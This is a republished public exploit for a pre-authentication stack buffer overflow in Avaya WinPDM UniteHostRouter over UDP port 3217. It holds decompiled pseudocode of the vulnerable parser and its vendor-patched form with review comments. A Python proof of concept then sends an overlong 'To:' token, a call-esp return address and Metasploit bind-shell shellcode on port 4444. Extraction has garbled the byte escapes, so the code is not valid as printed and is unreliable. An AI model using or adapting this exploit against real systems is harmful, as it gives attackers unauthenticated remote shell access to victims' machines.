[remote exploits] – Avaya WinPDM UniteHostRouter <= 3.8.2 Pre-Auth Command Execute
# Abysssec Public Exploit
# more info www.abysssec.com
# Avaya WinPDM UniteHostRouter <= 3.8.2 Remote Pre-Auth Command Execute
#A boundary error in the Unite Host Router service (UniteHostRouter.exe)
#when processing certain requests can be exploited to cause a stack-based buffer
#overflow via an overly long string in the "To:" field sent to UDP port 3217.
”’
/*
 * Decompiler pseudocode (IDA style) of the request-field parser in
 * UniteHostRouter.exe as printed in the advisory; not compilable C as-is
 * (__cdecl, _BYTE, and the dash on the "v6 = v5 – v4" line is an
 * extraction artifact for '-').  The strpbrk character sets read "nr",
 * "/nr" and ":/? nr" on this page; presumably they were CR/LF escapes
 * whose backslashes were lost in extraction — TODO confirm against the
 * binary.
 *
 * Str: NUL-terminated request text (strpbrk requires a terminator).
 * a2:  caller-supplied output buffer.  No capacity is passed in, and
 *      none is assumed by the copy below.
 * Returns 1 after copying the bytes between the first '/' on the first
 * line and the next ':' '/' '?' space or line end into a2 and
 * NUL-terminating it; returns 0 when the '/' or the following delimiter
 * is not found before the end of the first line.
 *
 * Defect (the advisory's "boundary error"): the copy length v6 is
 * derived only from where the next delimiter lands in attacker-controlled
 * input and is never compared with the size of a2, so an over-long token
 * overruns the caller's buffer.  Two further gaps the vendor fix closes:
 * a NULL v3 (no '/' found) is compared against v2 and then incremented
 * instead of being rejected, and a NULL v5 makes "v5 > v2" false so that
 * v6 = v5 - v4 wraps to a huge unsigned length before the memcpy.
 */
signed int __cdecl sub_403160(const char *Str, void *a2)
{
char *v2;
char *v3;
const void *v4;
char *v5;
unsigned int v6;
signed int result;
v2 = strpbrk(Str, "nr"); // end of the first line (delimiter set as printed on this page; see header)
v3 = strpbrk(Str, "/nr"); // first '/' or line end; the token starts one byte after it
// Reject when the '/' is not before the line end, or when the token's
// closing delimiter is past the line end.  Both strpbrk results may be
// NULL and neither is checked for it.
if ( v3 >= v2 || (v4 = v3 + 1, v5 = strpbrk(v3 + 1, ":/? nr"), v5 > v2) )
{
result = 0;
}
else
{
v6 = v5 – v4; // token length taken purely from the input; never bounded by a2's capacity
memcpy(a2, v4, v6); // vulnerable memcpy
*((_BYTE *)a2 + v6) = 0; // terminator store, also unbounded
result = 1;
}
return result;
}
/*
 * Vendor-patched form of sub_403160 (same decompiler pseudocode caveats:
 * __cdecl, _BYTE, the dash on the v6 line standing in for '-', and the
 * strpbrk character sets printed without their backslashes — TODO confirm
 * against the binary).
 *
 * Str: NUL-terminated request text.
 * a2:  caller-supplied output buffer.  The copy is capped at 256 bytes and
 *      a terminator is stored at a2[v6], so a2 must hold at least 257
 *      bytes — the caller's actual buffer size is not visible here;
 *      TODO confirm.
 * Returns 1 and copies the token into a2 (NUL-terminated) only when every
 * check in the condition holds; otherwise returns 0.
 *
 * Compared with the original, the condition now (1) rejects a NULL result
 * from each strpbrk before it is dereferenced or incremented, (2) keeps the
 * same ordering requirements (the '/' before the line end, the closing
 * delimiter at or before it), and (3) refuses tokens longer than 256 bytes,
 * which is what removes the stack-based overflow described in the advisory.
 * The short-circuit evaluation order matters: v3, v5 and v6 are only
 * assigned after the preceding checks pass.
 */
signed int __cdecl sub_403160_patched(const char *Str, void *a2)
{
char *v2;
char *v3;
const void *v4;
char *v5;
unsigned int v6;
signed int result;
v2 = strpbrk(Str, "nr"); // end of the first line
if ( v2 // line end must exist
&& (v3 = strpbrk(Str, "/nr")) != 0 // '/' or line end must exist
&& v3 < v2 // ... and the '/' must come before the line end
&& (v4 = v3 + 1, (v5 = strpbrk(v3 + 1, ":/? nr")) != 0) // closing delimiter must exist
&& v5 <= v2 // ... and lie within the first line
&& (v6 = v5 – v4, (signed int)v6 <= 256) ) // patched by checking <= 256
{
memcpy(a2, v4, v6); // at most 256 bytes
*((_BYTE *)a2 + v6) = 0; // byte 257 at most
result = 1;
}
else
{
result = 0;
}
return result;
}
”’
from socket import socket, AF_INET, SOCK_DGRAM
# Advisory proof-of-concept as published (Python 2 syntax: `print` statements).
# NOTE(review): the byte escapes and quote characters on this page are
# garbled by extraction ('x55×54…' with the backslashes dropped and '×' in
# place of 'x'); the text is reproduced exactly as shown and is not valid
# Python as it stands.
# What the single datagram contains, per the comments in this script: a
# protocol prefix, a " To: <addr>" header, a '/'-prefixed token of 260 'A'
# bytes (longer than the 256-byte cap in sub_403160_patched above), a 4-byte
# address, a bind-shell payload (port 4444), then a blank line.  From a
# detection standpoint the distinguishing feature is a UDP/3217 request whose
# "To:" line carries an over-long slash-delimited token.
data = ‘x55×54x50×2fx31′ # Protocol
data +=’ To: 127.0.0.1′
data+= ‘ /’+"A"*260  # 260 bytes: past the 256-byte bound the vendor patch enforces
data+= "xFBxF8xABx71" # 71ABF8FB call esp W32_SOCK.dll
# win32_bind – EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum
# http://metasploit.com
data += ("xebx03×59xebx05xe8xf8xffxffxffx4fx49×49x49×49x49"
"x49×51x5ax56×54x58×36x33×30x56×58x34×41x30×42x36"
"x48×48x30×42x33×30x42×43x56×58x32×42x44×42x48×34"
"x41×32x41×44x30×41x44×54x42×44x51×42x30×41x44×41"
"x56×58x34×5ax38×42x44×4ax4fx4dx4ex4fx4cx36×4bx4e"
"x4fx44×4ax4ex49×4fx4fx4fx4fx4fx4fx4fx42×56x4bx58"
"x4ex56×46x32×46x32×4bx38×45x44×4ex43×4bx58×4ex47"
"x45×50x4ax57×41x50×4fx4ex4bx38×4fx34×4ax41×4bx58"
"x4fx55×42x52×41x30×4bx4ex43×4ex42×53x49×54x4bx38"
"x46×53x4bx58×41x30×50x4ex41×33x42×4cx49×39x4ex4a"
"x46×58x42×4cx46×57x47×30x41×4cx4cx4cx4dx50×41x30"
"x44×4cx4bx4ex46×4fx4bx33×46x55×46x42×4ax42×45x57"
"x43×4ex4bx58×4fx55×46x52×41x50×4bx4ex48×36x4bx58"
"x4ex50×4bx34×4bx48×4fx55×4ex41×41x30×4bx4ex43×30"
"x4ex52×4bx48×49x38×4ex36×46x42×4ex41×41x56×43x4c"
"x41×43x42×4cx46×46x4bx48×42x54×42x33×4bx58×42x44"
"x4ex50×4bx38×42x47×4ex41×4dx4ax4bx48×42x54×4ax50"
"x50×35x4ax46×50x58×50x44×50x50×4ex4ex42×35x4fx4f"
"x48×4dx41×53x4bx4dx48×36x43×55x48×56x4ax36×43x33"
"x44×33x4ax56×47x47×43x47×44x33×4fx55×46x55×4fx4f"
"x42×4dx4ax56×4bx4cx4dx4ex4ex4fx4bx53×42x45×4fx4f"
"x48×4dx4fx35×49x48×45x4ex48×56x41×48x4dx4ex4ax50"
"x44×30x45×55x4cx46×44x50×4fx4fx42×4dx4ax36×49x4d"
"x49×50x45×4fx4dx4ax47×55x4fx4fx48×4dx43×45x43×45"
"x43×55x43×55x43×45x43×34x43×45x43×34x43×35x4fx4f"
"x42×4dx48×56x4ax56×41x41×4ex35×48x36×43x35×49x38"
"x41×4ex45×49x4ax46×46x4ax4cx51×42x57×47x4cx47×55"
"x4fx4fx48×4dx4cx36×42x31×41x45×45x35×4fx4fx42×4d"
"x4ax36×46x4ax4dx4ax50×42x49×4ex47×55x4fx4fx48×4d"
"x43×35x45×35x4fx4fx42×4dx4ax36×45x4ex49×44x48×38"
"x49×54x47×55x4fx4fx48×4dx42×55x46×35x46×45x45×35"
"x4fx4fx42×4dx43×49x4ax56×47x4ex49×37x48×4cx49×37"
"x47×45x4fx4fx48×4dx45×55x4fx4fx42×4dx48×36x4cx56"
"x46×46x48×36x4ax46×43x56×4dx56×49x38×45x4ex4cx56"
"x42×55x49×55x49×52x4ex4cx49×48x47×4ex4cx36×46x54"
"x49×58x44×4ex41×43x42×4cx43×4fx4cx4ax50×4fx44×54"
"x4dx32×50x4fx44×54x4ex52×43x49×4dx58×4cx47×4ax53"
"x4bx4ax4bx4ax4bx4ax4ax46×44x57×50x4fx43×4bx48×51"
"x4fx4fx45×57x46×54x4fx4fx48×4dx4bx45×47x35×44x35"
"x41×35x41×55x41×35x4cx46×41x50×41x35×41x45×45x35"
"x41×45x4fx4fx42×4dx4ax56×4dx4ax49×4dx45×30x50×4c"
"x43×35x4fx4fx48×4dx4cx56×4fx4fx4fx4fx47×33x4fx4f"
"x42×4dx4bx58×47x45×4ex4fx43×38x46×4cx46×36x4fx4f"
"x48×4dx44×55x4fx4fx42×4dx4ax36×4fx4ex50×4cx42×4e"
"x42×36x43×55x4fx4fx48×4dx4fx4fx42×4dx5a")
data += ‘rnrn’ #nn  # presumably the CR/LF pair that ends the header block, escapes lost in extraction
port = 3217  # the UDP port the advisory names for the Unite Host Router service
hostname = ‘192.168.171.129′  # hard-coded destination as published
udp = socket(AF_INET,SOCK_DGRAM)
udp.sendto(data, (hostname, port))  # one unauthenticated datagram; no response is read
print "Send malicius packetn"  # runtime string left as printed (typo and lost "\n" escape are in the original)
print "You Should Got a shell at %s 4444" % hostname
# [1337day.com][1] [2012-01-20]
[1]: http://www.1337day.com/
